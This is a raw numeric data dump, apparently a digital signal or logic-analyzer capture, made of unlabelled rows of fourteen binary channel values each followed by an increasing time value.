0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138860e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138884e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138908e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138932e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138956e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138980e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139008e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139032e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139060e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139084e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139108e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139180e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139208e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139232e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139260e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139308e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139332e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139380e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139408e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139432e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139460e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139484e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139508e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139532e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139556e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139580e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139608e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139632e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139660e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139684e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139708e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139732e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139780e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139808e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139832e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139860e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139884e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139908e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139932e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2139956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2139980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140008e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140032e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140060e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140084e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140108e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140132e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140156e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140180e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140208e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140236e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140260e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140284e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140308e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140332e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140384e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140412e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140436e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140460e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140484e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140508e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140532e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140556e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140584e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140612e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140636e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140660e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140684e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140708e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140732e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140784e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140812e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140836e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140860e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140884e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140908e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140932e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2140960e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2140984e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141012e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141040e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141064e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141092e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141116e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141140e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141164e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141188e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141212e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141240e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141264e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141292e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141316e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141340e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141364e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141388e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141412e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141440e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141464e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141492e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141516e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141540e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141564e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141588e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141612e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141640e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141664e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141692e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141716e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141740e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141764e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141788e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141812e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141840e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141864e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141892e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141916e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141940e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2141964e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2141988e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142012e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142040e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142064e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142092e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142116e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142140e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142164e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142188e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142212e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142240e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142264e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142292e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142316e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142340e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142364e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142388e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142412e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142440e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142464e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142492e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142516e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142540e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142564e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142588e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142612e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142640e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142664e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142692e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2142716e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2142740e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2142744e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,1.2267480e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,1.2267704e-02 1,0,1,1,0,1,0,0,0,1,0,1,0,1,1.2267732e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,1.2267760e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,1,1.2268076e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,1.2268100e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2268108e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2268124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2268148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2268172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2268196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2268224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2268248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2268272e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2268300e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268312e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268472e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268548e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268572e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2268580e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2268624e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2268648e-02 1,0,1,1,0,1,0,0,0,0,0,0,0,0,1.2268652e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268656e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268672e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268872e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2268972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2268996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269048e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269072e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269148e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2269156e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2269196e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269228e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269248e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269272e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269300e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269324e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269348e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269372e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269396e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269424e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269448e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269472e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269548e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269572e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269628e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269672e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269800e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269852e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2269876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2269900e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2269904e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2269924e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2269948e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2269972e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2270000e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2270024e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2270052e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2270076e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2270100e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2270124e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2270148e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2270200e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2270228e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270232e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270252e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270276e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270300e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270324e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270348e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270372e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270400e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270424e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270448e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270472e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270548e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270572e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270596e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270620e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270648e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270672e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270748e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270820e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270848e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270872e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270924e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270948e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2270972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2270996e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271020e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271048e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271072e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271148e-02 1,0,1,1,0,0,0,0,0,1,0,0,0,0,1.2271152e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2271156e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,1.2271196e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2271220e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271228e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271248e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271272e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271300e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271324e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271348e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271372e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271396e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271420e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271448e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271472e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271548e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271572e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271596e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271620e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271648e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271672e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271748e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271872e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2271972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2271996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272020e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272048e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272072e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272220e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272272e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272472e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272672e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272820e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272872e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2272972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2272996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273020e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273048e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273072e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273220e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273272e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273472e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273672e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273744e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273820e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273844e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273868e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273892e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273920e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273944e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2273972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2273996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274020e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274044e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274068e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274092e-02 